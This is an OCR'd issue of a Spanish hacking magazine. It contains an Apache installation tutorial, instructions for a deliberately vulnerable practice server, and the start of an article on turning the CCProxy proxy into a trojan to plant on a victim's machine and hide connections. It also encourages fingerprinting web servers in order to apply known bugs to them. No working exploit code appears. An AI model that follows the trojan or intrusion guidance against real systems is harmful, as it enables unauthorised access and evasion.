            ordenador aprenderás más rápido muchas de            es el ordenador que "sirve" la información
            las lecciones de hackxcrack, prueba y no dejes       y el navegador (Internet Explorer, Netscape,
            de probar en tu ordenador ya que no corres           Opera…) es el cliente. Desde este momento
            riesgo y cuando compruebes que no dejas              llamaremos al ordenador que tiene la
            rastro entonces tu mismo decides donde ...,          aplicación de servir las páginas como
            ejem, vamos a centrarnos.                            "servidor".

Página 48                                                                                           PC PASO A PASO Nº 7
APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO




  !             En los anteriores...

  En los anteriores números de PC PASO A PASO (Los
  Cuadernos de Hack x Crack) hemos explicado con todo
  lujo de detalle y en profundidad lo que es un Servidor, un
  Cliente, el puerto que escucha un Servidor Web (80), un
  nombre de dominio, un servidor DNS, etc. Para seguir este
  curso de APACHE no es necesario haber leído los números
  anteriores de la revista, puesto que todos los cursos se
  inician desde cero e incluyen las explicaciones pertinentes;
  pero si realmente quieres sacarle provecho y profundizar
  en el tema sería bueno que leyeses los números anteriores
  (el número 1 de hack x crack está disponible en la web
  www.hackxcrack.com de forma totalmente gratuita).
                                                                                    www.dnsstuf f.com

             Existen muchos servidores web, los más
                                                                 El curso se centrará en el servidor web Apache,
             conocidos son: Apache, Internet Information
                                                                 las razones son muchas, sigue leyendo y
             Server (de Microsoft), Netscape Enterprise,
                                                                 comprenderás las razones aunque no
             Zeus, ... Cada uno de ellos tienen sus
                                                                 descartamos ampliar el curso a otros servidores
             características propias y lógicamente con bugs
                                                                 web.
             diferentes (errores de programación, agujeros
             de seguridad…). Es importante conocer el
             servidor web que hace funcionar un dominio
                                                                 3.- La herramienta: Apache
             pues dependiendo del servidor tendrás que
                                                                 El 65% de los servidores web instalados son
             aplicar sus bugs si te interesa hacerle una
                                                                 Apache según netcracft.com, personalmente
             visita para comprobar tus conocimientos de
                                                                 el servidor que mejores resultados me ha dado
             seguridad adquiridos X)
                                                                 ha sido Apache, además en la web oficial de
                                                                 Apache tienes los códigos por si necesitas
             En la red existen herramientas online que te
                                                                 adaptar el servidor a tus necesidades.
             facilitarán la labor de averiguar el servidor web
             de los dominios, recomendamos
                                                                 Apache es sencillo de instalar y se encuentra
             www.netcraft.com y www.dnsstuff.com, verás
                                                                 para la mayoría de los sistemas operativos, no
             cuanta información obtendrás de cada dominio.
                                                                 sólo funciona con todas las versiones de Unix
                                                                 sino que también lo hace con Windows 95, 98,
                                                                 NT Amiga y OS/2. Como te habrás podido
                                                                 imaginar si te haces con la lista de bugs del
                                                                 servidor Apache tienes un 65% (22.045.420,
                                                                 uff un motón) de servidores esperando tu visita
                                                                 ;-)

                                                                 Y lo más importante, Apache es gratuito. Como
                                                                 la mayoría de vosotros tenéis instalado el
                                                                 sistema operativo Windows 98 (54% según
                   www.netcraft.com                              www.intrastats.com) hemos decidido iniciar el

PC PASO A PASO Nº 7                                                                                                Página 49
APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO




             curso con la instalación de Apache en este      4.- Comenzamos la instalación
             sistema operativo.
                                                             Vamos al grano, comenzamos la instalación del
                                                             servidor WEB. Antes de comenzar la instalación
                                                             necesitas: El fichero que te has bajado de la
                                                             web de Apache, tener la pila TCP/IP instalada
                                                             en el ordenador, si tienes conexión a Internet
                                                             en el mismo ordenador donde vas a instalar el
                                                             Apache no tienes que preocuparte seguro que
                                                             tienes la pila instalada, en caso contrario primero
                                                             instala el protocolo TCP/IP. ¿Comenzamos?

                                                             Paso 1.

                                                             Pincha sobre el ejecutable apache_1.3.27-
                                                             win32-x86-no_src.exe, tras varias ventanas
                                                             indicando que se va proceder a la instalación
                                                             de apache, la instalación se detiene en una
                 www.intrastats.com                          ventana que te pregunta que si deseas continuar
                                                             después de leer el copyrigth de Apache, bla,
             Para conseguir el servidor Apache que mejor     bla, bla, sin dudar "Aceptas" para continuar
             que bajárselo de la página oficial,             con la instalación.
             www.apache.org, la web está en inglés, pon
             la siguiente url y te ahorras tener que ir
             navegando:

             http://apache.mirrorcentral.com/dist/httpd/bi
             naries/win32/apache_1.3.27-win32-x86-
             no_src.exe




                                                             Paso 2.

                                                             Ahora pretende que te leas la licencia, está
                                                             en perfecto inglés, nuestra obligación es decirte
                                                             que leas los términos y condiciones de uso,
                                                             ¿alguna vez hemos leído estas parrafadas? ,
                                                             resumiendo, lo que dice es que señales la
                   www.apache.or g                           opción de que estás de acuerdo con los términos

Página 50                                                                                          PC PASO A PASO Nº 7
APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO




          y condiciones. Sin dudarlo selecciona la opción     Email del administrador:               Poner
          "I accept the terms in the license agreement."      webmaster@dominio.com

                                                              Por último te pregunta como quieres que se
                                                              realice la puesta en marcha de Apache, por
                                                              servicio o manual. Si deseas que Apache se
                                                              ponga en funcionamiento cada vez que
                                                              enciendas el ordenador y se inicie Windows
                                                              entonces tienes que seleccionar "Por servicio",
                                                              en cambio si deseas que Apache se ponga en
                                                              marcha cuando tú lo desees entonces selecciona
                                                              manual. De momento selecciona "manual", en
                                                              otro capitulo explicaremos como ponerlo como
                                                              servicio una vez que está como manual.




          Paso 3.

          De nuevo otra pantalla en anglosajón, aquí te
          explica ¿que es Apache?, bla, bla, bla, Pues
          nada ya sabes lo que tienes que hacer, pincha
          sobre el botón "Next >" para que podamos
          continuar.

          Paso 4.

          En la siguiente ventana ya comienza
          la verdadera instalación, te pregunta información
          sobre tu servidor. En estos momentos                Paso 5.
          nuestra intención es instalar Apache para
          probar en nuestro propio ordenador, el              Ahora te pregunta como quieres realizar la
          siguiente paso será configurar Apache               instalación "Completa o Personalizada", elige
          para que cualquier navegante conectado              "Completa", de esta forma instalará por
          a Internet pueda conectarse al ordenador.           completo Apache en el disco duro.
          Así que los valores que ahora pongamos
          podemos cambiarlos posteriormente con los           Paso 6.
          reales.
                                                              Por último te pregunta la carpeta donde quieres
          La ventana te pregunta:                             que se instalen los ficheros de Apache, crea un
          Dominio de red (dominio.com): Para continuar        directorio en C: llamado "apache" e instala en
          con la práctica poner dominio.com, luego ya         ese directorio todos los ficheros. Acepta todo
          cambiaremos los datos con los reales.               y comienza la instalación ...

          Nombre servidor: Poner www.dominio.com

PC PASO A PASO Nº 7                                                                                             Página 51
APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO




                                                                      con el del buen programador: nunca llamarás "A" a la
                                                                      variable "a" ni confundirás un cero con un campo vacío.
                                                                      Si lo entiendes ya sabes de qué hablamos y si no, con
                                                                      nosotros lo aprenderás paso a paso ;)


                                                                  Paso 7.

                                                                  A los pocos segundos y dependiendo de la
                                                                  potencia del ordenador llegarás a la ventana
                                                                  que te comunicará que la instalación se ha
                                                                  realizado con éxito. Acepta la ventana final y
                                                                  ya tienes instalado el servidor Apache en el
                                                                  directorio c:apache


                                                                  5.- Ejecución del Apache

                                                                  En el menú de Inicio verás una nueva opción
                                                                  "Apache HTTP Server", ejecuta el Apache
                                                                  seleccionando "Start Apache in Console". Verás
                                                                  como se abre una ventana de MSDOS que pone
                                                                  "Apache/1.3.27 (Win32) running ...". No cierres
                                                                  la ventana de MSDOS pues el servidor web
                                                                  funcionará mientras esté abierta, en futuros
                                                                  capítulos veremos como ocultarla.




             Pulsando "change" puedes crear y seleccionar
             el directorio donde deseamos instalar apache,
             en nuestro caso c:apache


  !             A partir de...

  A partir de ahora te en cuenta una cosa MUY
  IMPORTANTE: las mayúsculas NO EXISTEN a la hora
  de trabajar con los servidores Web. No, no es que les
  tengamos manía, pero si instalas el servidor en un directorio
  en mayúsculas o utilizas las mayúsculas para los archivos
  que crearemos posteriormente acabarás teniendo problemas.
  ¿Por qué? Podríamos dar muchos motivos, pero me quedo
                                                                                Ventana DOS del APACHE

Página 52                                                                                             PC PASO A PASO Nº 7
APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO




           Pues ya tienes el servidor en marcha,               archivos y directorios necesarios para hacer
           comprueba que está funcionando. Abre el             funcionar el servidor Apache, la estructura tiene
           navegador que tengas instalado, y pon la            que ser igual a la siguiente imagen.
           siguiente URL: 127.0.0.1, como ya sabes es
           la dirección Loopback, es una dirección IP
           interna de la pila TCP/IP que identifica la misma
           máquina. Es una dirección IP especial que te
           servirá para hacer pruebas.

           Si ha funcionado correctamente aparecerá la
           siguiente página como muestra la imagen:




                                                               De momento los únicos directorios que te
                                                               interesan son, conf y htdocs.
                                                               En el directorio conf se encuentran los archivos
                                                               de configuración de Apache, el más importante
                                                               es httpd.conf, prácticamente el 80% del curso
                                                               trata de cómo manipular los comandos
                                                               contenidos en este archivo. En el directorio
           Como puedes ver no ha sido tan difícil y has        htdocs pondremos nuestras páginas Web :)
           convertido tu ordenador en un servidor web,
           ¿has pensado alojar tu página personal en tu        7.- Tu primera web al mundo
           ordenador?, ya puedes hacerlo pero recuerda
           que tendrás que tener las 24 horas del día el       Ya que tienes el servidor instalado quieres tener
           ordenador encendido si deseas que accedan           tu primera web y que sea visitada por todo el
           a cualquier hora.                                   mundo, lo interesante y chulo de verdad es ver
                                                               como la luz del disco duro se enciende cuando
                                                               los navegantes comienzan a visitar tu web.
  !           En anteriores...                                 ¿Quieres que pongamos tu nuevo servidor web
                                                               disponible al mundo y que sea visitada por los
  En anteriores números te hemos explicado eso de la IP        navegantes?
  LOOP (dirección Loopback) con detalle :)                     Lo primero que necesitamos es contenido, es
                                                               decir, lo que quieres ofrecer, este curso no
                                                               pretende enseñar HTML, así que suponemos
                                                               que ya tienes nociones básicas de programación
           6.- Estructura de directorios                       web. Si tienes una web en algún servidor
                                                               gratuito considera a modo de práctica colocarlo
           En el directorio C:Apache encontrarás los          en tu propio servidor.

PC PASO A PASO Nº 7                                                                                                Página 53
APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO




                                                                Ahora quieres puedan acceder los navegantes
  !            Si no tienes...                                  desde cualquier parte del mundo. Lógicamente,
                                                                para que los navegantes puedan acceder a tu
                                                                servidor web es necesario que el servidor donde
  Si no tienes ni idea de crear una página Web, vamos a crear
                                                                esté funcionando Apache esté conectado a
  la página Web más sencilla del planeta :)
                                                                Internet, con una línea ADSL es suficiente ya
                                                                que te ofrecen una IP fija y si tienes una
  Abre el Block de Notas de Windows (o cualquier otro
                                                                conexión de cable /DSL pues mucho mejor.
  editor de texto sencillo), escribe <BR> Hola a todo el
  mundo <BR> y guárdalo con el nombre index.txt donde
                                                                Comprueba que estás conectado a Internet y
  quieras, por ejemplo en c:temporal. Ahora cambiale el
                                                                que tienes una IP asignada. Para averiguar la
  nombre por index.html y se acabó, ya tienes una página
                                                                IP puedes utilizar el comando "winipcfg" (solo
  web :) Ahora nos queda hacer que nuestro APACHE sirva
                                                                para windows 98) o "ipconfig/all" (Windows
  la página a los clientes :)
                                                                2000/XP), puedes ejecutarlo desde la ventana
                                                                ejecutar o desde el MSDOS. Este comando te
                                                                aporta información sobre los adaptadores de
            El contenido de nuestra web (en este caso
                                                                red (tarjetas de red, modem, ...), verás que
            nuestra diminuta creación, nuestro index.html)
                                                                cada adaptador de red tiene asociada un
            tienes que colocarlo en el directorio
                                                                identificador IP.
            c:apachehtdocs. Recuerda llamar a la página
            principal como index.html o index.htm, es la
            página principal que se muestra cada vez que
            se coloca el nombre de dominio en el navegador.
            Como se ha comentado anteriormente el
            nombre de la página principal se puede cambiar
            en el fichero httpd.conf, pero vamos a dejar
            esto para el próximo capítulo.


  !            Antes de seguir...


  Antes de seguir, comprueba que puedes ver la página que
  hemos creado mediante la dirección Loopback (127.0.0.1).
  Abre el navegador, introduce la dirección y deberías ver
  exactamente esto:
                                                                    !           En los números...

                                                                   En los números anteriores de PC PASO A PASO hemos
                                                                   explicado diversos métodos para que descubras tu IP y
                                                                   hemos detallado los pasos. Si no sabes cuál es tu IP llama
                                                                   a tu ISP (Proveedor de Internet) o repasa los anteriores
                                                                   números de esta revista.


                                                                En mi caso tengo la IP 80.213.111.23, pon TU
                                                                IP en el navegador y con el servidor web Apache
                                                                en marcha verás la página index.html (en este


Página 54                                                                                            PC PASO A PASO Nº 7
APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO




           caso nuestro "hola a todo el mundo" ;)            que el proveedor ISP te cambie la IP en cualquier
                                                             momento vamos a conseguir un dominio y
           Pues bien, con tu ordenador haciendo de           asociarlo a la dirección IP. Nuestro objetivo es
           servidor web conectado a Internet, cualquier      conseguir el servicio de redirección gratis, existen
           persona desde cualquier parte del mundo que       muchos servicios en Internet que ofrecen
           en este momento ponga tu IP en su navegador       redirecciones. Para hacerlo más elegante las
           verá tu página principal. Como te habrás dado     premisas del redireccionador tiene que cumplir:
           cuenta si tu proveedor de acceso a Internet te    No ponga publicidad y que no aparezca la IP
           cambia la IP, todo tu esfuerzo de dar a conocer   en el dominio una vez que ha redireccionado.
           la IP será en balde ya que nadie volverá a
           conectarse, es por ello que se recomienda         Uno de mis favoritos ya que oculta la IP mediante
           tener una IP dedicada, si tienes ADSL o cable     Frames de HTML y no añade publicidad es el
           no tendrás problemas por mucho tiempo.            redireccionador de           w w w. k i c k m e . t o

           Lo mejor es asociar la IP a un dominio, nadie     El registro en www.kickme.to es rápido y sencillo,
           se aprende las direcciones IP de memoria,         está en inglés pero no tiene que ser problema
           aunque conocí a un chaval que tenía como          ¡¡hay tan poco que leer!!.
           hobby aprenderse todas las IP que encontraba,
           hay gente para todo...                            Comenzamos...
                                                             Paso 1. Visita www.kickme.to
           Ya tenemos el servidor web Apache, ahora          Como verás la página principal tiene poco
           queremos asociarlo a un dominio para que sea      contenido, pues mejor, menos que leer ¿verdad?.
           fácil de recordar para los navegantes.            Pincha en el enlace "Free short URL".


  !            Si tu ISP...


  Si tu ISP (Proveedor de Internet) te ha dado una IP
  DINÁMICA, cada cierto tiempo verás que TU IP cambia.
  Cada vez que esto suceda deberás asociar de nuevo TU IP
  al dominio y repetir los pasos que ahora te mostraremos,
  algo bastante desesperante.

  En el número 4 te enseñamos cómo conseguir una IP FIJA,
  te recomendamos encarecidamente que leas PC PASO A
  PASO número 4 y te liberes de las limitaciones que te
  impone tu ISP. Como puedes ver, todo lo que hemos ido
  aprendiendo anteriormente empieza a sernos muy útil (por
  no decir imprescindible).
                                                             Paso 2. Enlace registro
                                                             Vemos otra página con poco contenido, solo 4
           8.- Consiguiendo un dominio gratis                enlaces, como mola una página tan directa.
                                                             Venga, pincha en "Signup".
           Nuestra intención es redirigir al navegante a
           nuestro servidor, como memorizar una              Paso 3. Aceptar términos y condiciones
           dirección IP es complicada y puede ocurrirte      Como siempre y cualquier registro tienes que

PC PASO A PASO Nº 7                                                                                                  Página 55
APACHE - SERVIDOR WEB GRATUITO - APACHE - SERVIDOR WEB GRATUITO




              leer la parrafada de los términos y condiciones   creada una para estos menesteres, y un
             para terminar aceptando. Como el color de la       password para poder acceder a tu cuenta en
             página es azul oscuro no ayuda a leer el texto     kickme.to.
             con color negro, y siempre estamos de acuerdo
             con las condiciones aceptamos sin perder más       Paso 6. ¡¡¡Última página!!!
             tiempo. Aunque es mi obligación decirte que        Ahora te pregunta hacia donde tiene que
             leas los términos y condiciones, ¡¡¡pero hombre,   redireccionar www.divxlink.at/divx, como te
             por lo menos lee y PULSA el botón donde pone       estarás imaginando tienes que colocar la IP de
             "I AGREE" (ACEPTAR)!!!                             tu servidor web, tu PC (en nuestro caso
                                                                http://80.213.111.23)
             Paso 4. Crear nombre de dominio
             Ya nos vamos acercando a lo interesante y al
             final. Seleccionamos por ejemplo la url
             www.divxlinks.at y en el cuadro de al lado
             pondremos un nombre (nosotros hemos puesto
             divx) para que cualquier navegante que ponga
              www.divxlinks.at/divx sea enviado a la IP de
             nuestro servidor web (nuestro PC).




                                                                Ya tienes un dominio (un nombre) asociado a
                                                                tu servidor (tu PC), en vez de promocionar la
                                                                ip de tu servidor tienes la posibilidad de dar a
                                                                conocer la url www.divxlink.at/divx, cualquier
                                                                navegante que ponga esa dirección estará
                                                                accediendo a tu ordenador. Sencillo ¿verdad?.


                                                                ¿Qué has aprendido?
  !            Nosotros               hemos...                  Si eres nuevo en este tema y has seguido el
                                                                ejemplo práctico seguro que te habrás dado
  Nosotros hemos puesto divx y por lo tanto tenemos             cuenta de todas las posibilidad que te ofrece
  reservada la dirección (el nombre de dominio)                 tener un servidor web en casa. Has aprendido
  www.divxlinks.at/divx. TU NO DEBES poner el mismo             como hallar el servidor web de cualquier
  (divx) puesto que es nuestro y no te será concedido, por lo   dominio, has aprendido a instalar un servidor
  tanto invéntate un nombre, por ejemplo "soyelmejor" y         web Apache (con configuración por defecto),
  obtendrás la dirección www.divxlinks.at/soyelmejor ;)         la utilidad del comando winipcfg de windows,
                                                                a crear un dominio gratis que redireccione a
             Paso 5. Introducir datos de login y                tu servidor web.
             password.                                          El próximo mes comenzaremos a configurar el
             Pues ya sabes, tienes que introducir un login      servidor Apache.
             que será una cuenta de email, ten siempre


Página 56                                                                                           PC PASO A PASO Nº 7
SERVIDOR DE HXC
                            MODO DE EMPLEO


          - Hack x Crack ha habilitado un servidor para que puedas     A partir de ese momento, cualquiera que acceda a ese
          realizar las prácticas de hacking.                           servidor, verá el default.htm modificado para vergüenza
                                                                       del “site” hacheado. Esto es muy genérico pero os dará
          - Actualmente tiene el BUG del Code / Decode y lo            una idea de cómo funciona esto de hackear Webs ;)
          dejaremos así por un tiempo (bastante tiempo ;) Nuestra
          intención es ir habilitando servidores a medida que os       - Cuando accedas a nuestro servidor mediante el CODE /
          enseñemos distintos tipos de Hack, pero por el momento       DECODE BUG, crea un directorio con tu nombre (el que
          con un Servidor tendremos que ir tirando (la economía no     mas te guste, no nos des tu DNI) en la unidad d: a ser
          da para mas).
                                                                       posible (que tiene mas espacio libre) y a partir de ahora
          - En el Servidor corre un Windows 2000 Advanced Server       utiliza ese directorio para hacer tus prácticas. Ya sabes,
          con el IIS de Servidor Web y está en la IP 80.36.230.235.    subirnos programitas y practicar con ellos :)

          - El Servidor tiene tres unidades:                           Puedes crearte tu directorio donde quieras, no es necesario
          * La unidad c: --> Con 2GB                                   que sea en d:mellamojuan. Tienes total libertad!!! Una
          * La unidad d: --> Con 35GB y Raíz del Sistema               idea     es     crearlo,        por     ejemplo,        en
          * La unidad e: --> CD-ROM                                    d:winntsystem32defaultmellamojuan (ya irás
                                                                       aprendiendo que cuanto mas oculto mejor :)
          Nota: Raíz del Servidor, significa que el Windows Advanced
          Server está instalado en esa unidad (la unidad d:) y         Es posiblemente la primera vez que tienes la oportunidad
          concretamente en el directorio por defecto winnt           de investigar en un servidor como este sin cometer un
          Por lo tanto, la raíz del sistema está en d:winnt          delito (nosotros te dejamos y por lo tanto nadie te
                                                                       perseguirá). Aprovecha la oportunidad!!! e investiga mientras
          - El IIS, Internet Information Server, es el Servidor de     dure esta iniciativa (que esperamos dure largos años)
          páginas Web y tiene su raíz en d:inetpub (el directorio
          por defecto)                                                 - En este momento tenemos mas de 600 carpetas de peña
                                                                       que, como tu, está practicando. Así que haznos caso y
          Nota: Para quien nunca ha tenido instalado el IIS, le será   crea tu propia carpeta donde trabajar.
          extraño tanto el nombre de esta carpeta (d:inetpub) cómo
          su contenido. Pero bueno, un día de estos os enseñaremos
          a instalar vuestro propio Servidor Web y detallaremos su
          funcionamiento.

          De momento, lo único que hay que saber es que cuando
          TÚ pongas nuestra IP (la IP de nuestro servidor) en tu
          navegador, lo que estás haciendo realmente es ir al               !               MUY IMPORTANTE...
          directorio d:Inetpubwwwroot y leer un archivo llamado
          default.htm.

          Nota: Como curiosidad, te diremos que APACHE es otro              MUY IMPORTANTE!!!!!                    Por favor, no borres archivos
          Servidor de páginas Web (seguro que has oído hablar de
          él). Si tuviésemos instalado el apache, cuando pusieses          del Servidor si no sabes exactamente lo que estás haciendo ni
          nuestra IP en TU navegador, accederías a un directorio           borres las carpetas de los demás usuarios. Si haces eso, lo único
          raíz del Apache (donde se hubiese instalado) e intentarías
          leer una página llamada index.html                               que consigues es que tengamos que reparar el sistema servidor
                                                                           y, mientras tanto, ni tu ni nadie puede disfrutar de él :(
          Explicamos esto porque la mayoría, seguro que piensa en
          un Servidor Web como en algo extraño que no saben ni             Es una tontería intentar “romper” el Servidor, lo hemos puesto
          donde está ni como se accede. Bueno, pues ya sabes               para que disfrute todo el mundo sin correr riesgos, para que todo
          dónde se encuentran la mayoría de IIS (en Inetpub) y
          cuál       es    la    página        por      defecto            el mundo pueda crearse su carpeta y practicar nuestros ejercicios.
          (Inetpubwwwrootdefault.htm). Y ahora, piensa un poco…
                                                                           En el Servidor no hay ni Warez, ni Programas, ni claves, ni nada
          … ¿Cuál es uno de los objetivos de un hacker que quiere
          decirle al mundo que ha hackeado una Web? Pues está              de nada que “robar”, es un servidor limpio para TI, por lo tanto
          claro, el objetivo es cambiar (o sustituir) el archivo
          default.html por uno propio donde diga “hola, soy DIOS           cuídalo un poquito y montaremos muchos más :)
          y he hackeado esta Web” (eso si es un lamer ;)




PC PASO A PASO Nº 7                                                                                                                    Página 57
CCPROXY: El Cuarto troyano
           de PC PASO A PASO

                                          - Instalaremos un servidor Proxy en nuestro PC
                                          - Lo "prepararemos" para transformarlo en un troyano
                                          - Lo subiremos a una víctima y lo ejecutaremos
                                          - Lo utilizaremos para ocultar nuestra conexión



            1.- Conociendo al SR. CCPROXY

            ADVERTENCIA: En este texto se utilizarán conocimientos adquiridos durante los anteriores 6
            números publicados. Si no entiendes algunos de los conceptos que aquí explicaremos es porque
            hay muchos elementos implícitos, te recomendamos que pidas los número atrasados (al final
            de esta revista puedes consultar la lista disponible).

            CCPROXY es un servidor Proxy aparentemente inofensivo pero que por su "peculiar" forma de
            operar nos va a permitir transformarlo en un troyano, ejecutarlo en una víctima y utilizarlo para
            anonimizar nuestras "andanzas" por Internet.

            Ya se ha explicado en anteriores números muchas cosas sobre los proxys, para quien no los ha
            leído haremos un par de referencias:

            1.- Imagina que tienes 5 ordenadores conectados en Red pero solo uno tiene acceso a Internet
            (que somos pobres y eso de pagar 5 líneas a Telefónica no nos hace gracia), pues bien, instalando
            el Servidor Proxy en el ordenador que tiene salida a Internet permitirá que los otros 4 PCs puedan
            acceder a Internet a través de él.

                                                                                                       Todos los PCs están conectados
              Ordenadores de nuestra
              Casa/oficina conectados                                                                  entre sí mediante la Red Interna
              en Red y uno con
              conexión a Internet                                                                      (Ip Interna) y uno de ellos tiene
                             Ordenador 2                                                               conexión a Internet (IP Externa).
                             IP Interna 192.168.0.2


                                                                                                       Cuando el PC número 2 (por
                             Ordenador 3                                                               ejemplo) quiera acceder a Internet,
                             IP Interna 192.168.0.3
                                                                                      PC remoto
                                                                                                       se conectará al PC1 (192.168.0.1)
                                                                                                       en el puerto donde está el Servidor
                             Ordenador 1
                             (T iene un Servidor Proxy Instalado                                       Proxy (8080) y hará de puente. A
             Intranet




                             escuchando el puerto 8080)                       www.mocosoft.com
                                                                              www.mocosoft.com
                             IP Interna 192.168.0.1
                                                                   Internet
                                                                                                       Internet solo se puede acceder
                             IP Externa 80.37.158.23                          IP Externa:
                                                                              66.111.52.196
                                                                              66.11                    con una IP Externa (ya explicamos
                             Ordenador 4
                             IP Interna 192.168.0.4                           Recibe una petición      extensamente todo esto en los
                                                                              de la IP: 80.37.158.23
                                                                                                       números anteriores), por lo tanto
                                                                                                       el PROXY "cederá" su IP Externa
                             Ordenador 5
                             IP Interna 192.168.0.5                                                    al PC 2 (por eso lo de puente)
                                                                                                       para que pueda acceder al exterior.


Página 58                                                                                                                     PC PASO A PASO Nº 7
CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO




           El host remoto al que quiere acceder
                                                             Ordenadores de nuestros                                      W ebs V isitadas
           el Ordenador 2 (por ejemplo la Web                Amiguetes conectados a                                       por los amiguetes
                                                             Internet desde varios
           de Mocosoft, www.mocosoft.com)                    Puntos de España
                                                                                                                            Recibe peticiones de
           recibirá una petición desde la IP                                Amiguete 1                                      la IP 56.111.52.196
                                                                                                                                  56.11
                                                                            IP Externa 80.65.24.123
           80.37.158.23. Para Internet, los 5
           equipos de nuestra Intranet es como                                                                              Recibe peticiones de
           si fuese uno solo, puesto que TODOS                               Amiguete 2                                     la IP 56.111.52.196
                                                                                                                                  56.11
                                                                             IP Externa 83.54.215.78
           tendrán la IP EXTERNA 80.37.158.153                                                         www.mocosoft.com
                                                                                                       www.mocosoft.com
           gracias a nuestro Servidor Proxy :)                              Amiguete 3                 IP Externa:          Recibe peticiones de
                                                                            IP Externa 89.36.230.235   66.111.52.196
                                                                                                       66.11                la IP 56.111.52.196
                                                                                                                                  56.11


           También podemos utilizarlo de
           anonimizador (para ocultar nuestra IP).                                                                          Recibe peticiones de
                                                                                                                            la IP 56.111.52.196
                                                                                                                                  56.11
           Imagina que hackeamos el host de
           mocosoft, le metemos un Servidor
           Proxy y para colmo lo "anunciamos"                                                                               Recibe peticiones de
                                                                                                                            la IP 56.111.52.196
                                                                                                                                  56.11
           entre nuestros amigos para que lo
           utilicen, esto es lo que pasaría:


            Nuestros amigos, configuran su navegador (Internet Explorer, Netscape… ) para que utilicen a
            www.mocosoft.com (IP:56.111.52.196) de proxy. Desde ese instante, cualquier Web que visiten
            nuestros amigos recibirá la IP de mocosoft.

                                                                        2.- Instalación del CCPROXY en
  !            Todo esto...                                             nuestro PC.
  Todo esto se explicó sobradamente en anteriores números.
                                                            Antes que nada nos descargamos el programa
                                                            de la Web Oficial (http://www.youngzsoft.net)
            o de nuestra Web (www.hackxcrack.com) y lo instalamos. No tiene misterios, la instalación es
            prácticamente automática, por cierto, nosotros lo hemos instalado en la carpeta c:ccproxy.

           3.- Configurando el ccproxy:

           Venga, nos vamos a la carpeta donde lo hemos instalado y vemos unos cuantos archivos y
           carpetas.
                                                     El más importante a parte del ejecutable
                                                     (CCProxy.exe), es el CCProxy.ini. Este último
                                                     contiene la configuración del CCProxy en un
                                                     simple archivo de texto, ¿os suena?, muy muy
                                                     parecido al primer troyano que estudiamos en
                                                     hack x crack (el serv-u). Otro archivo importante
                                                     es el accinfo.ini, donde se guardan los usuarios
                                                     que creemos, este se utiliza en caso de que
                                                     quieras proteger tu Servidor Proxy de visitas
                                                     desconocidas, si no saben el user/pass no podrán
                                                     utilizar nuestro Proxy :)


PC PASO A PASO Nº 7                                                                                                                Página 59
CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO




                                                                 Lo primero que haremos es pinchar sobre el
  !             Es muy importante...                             botón OPTIONS y veremos los servicios que
                                                                 tiene este Proxy, no te quejarás ¿verdad? Hay
                                                                 bastantes ;)
  Es muy importante que sepas elegir bien las herramientas
  que utilizas. Este programa no es un virus, ni un troyano
  ni nada parecido, es un software conocido y ningún antivirus
  dará la alarma si lo ejecutas en un remoto. Por otro lado,
  la mayoría de los Servidores Proxy guardan su configuración
  en el registro de Windows (imposible de modificar si no
  tienes derechos de administrador) y este, en cambio, lo
  hace en un archivo *.ini que es en realidad un archivo de
  texto que podemos modificar con el Bloc de notas de
  Windows ¿Recuerdas el artículo del osito? ¿quedó claro,
  verdad?
  Presentándote al Sr. CCProxy te hemos ahorrado muchas
  horas de búsqueda y pruebas, intenta instalar cualquier otro
  Proxy y me apuesto lo que quieras a que tardas días en
  encontrar uno que no toque el registro de Windows para
  guardar su configuración… por cierto, podríamos habernos
  montado un Proxy sencillito nosotros mismos con el
  NETCAT (tocado en el número 3 de hackxcrack), pero eso
  os lo enseñaré otro día ;p                                                     Servicios a Configurar
  Ahhh!!!, por cierto, puedes hacer que el ccproxy se inicie
  en español (lo veremos luego), pero eso empezaría a dejar      ¿Qué significa todo eso? Verás, para no
  pistas sobre la procedencia del "infectador", y no nos         complicarnos la vida, diremos que un
  interesa, por lo tanto dejaremos la aplicación en Ingles :)    Proxy puede ofrecer varios servicios en
                                                                 puertos distintos. Me explico, un buen
                                                                 Servidor Proxy (en este caso el ccproxy),
            Nuestra intención es configurar el ccproxy de        puede trabajar de formas distintas según sea
            forma que podamos "traspasarlo" a cualquier          su misión:
            otro ordenador sin que rechiste al ser iniciado
            remotamente, que sirva a nuestros propósitos         - HTTP: Esto nos permite tener un Web-Proxy
            (anonimizar nuestras conexiones), que quede          y NO ACEPTARÁ que le pidas cosas distintas
            oculto en el remoto y aprendamos cositas por         a páginas Web puesto que, aunque
            el camino. Pues venga, ejecutamos en CCProxy         escuche las peticiones en cualquier
            y nos encontramos con la pantalla de inicio :)       puerto solo gestionará correctamente
                                                                 peticiones a Servidores Web (normalmente
                                                                 en el puerto 80). Fíjate en la imagen,
                                                                 nosotros hemos puesto el Servidor
                                                                 Proxy escuchando el puerto 2880.

                                                                 * Oye, perdona, me estoy perdiendo un poco…
                                                                 ¿me lo explicas mejor?
                                                                 Bueno, vale, venga, un dibujo para explicar
                                                                 mejor esta parrafada.


Página 60                                                                                          PC PASO A PASO Nº 7
CCPROXY - IV TROYANO - CCPROXY - IV TROYANO - CCPROXY - IV TROYANO




                                                                                                 Los PC1, 2 y 3 piden páginas Web, si
                                                                                                 activamos esa opción en el CCProxy
PCs en cualquier punto del Planeta                                 Servidores Web visitados
                                                                              Web
conectado a Internet que quieren                                   por los PC1, PC2, PC3…        tendremos ese servicio. Pero imagina
visitar páginas Web de forma anónima
                Web
a través de un W eb-Proxy                                                                        que esos PC quieren conectarse a
                                                                       www.hackxcrack.com
                                                                       www.hackxcrack.com
                PC1                                                    escuchando el puerto 80   servidores FTP de forma anónima, pues
                IP Externa 80.65.24.123
                                                                                                 entonces debemos habilitar ese servicio
                                                                       www.eresmas.com
                                                                       www.eresmas.com
                                                                       escuchando el puerto 80
                                                                                                 en la configuración del Proxy ;)
                 PC2
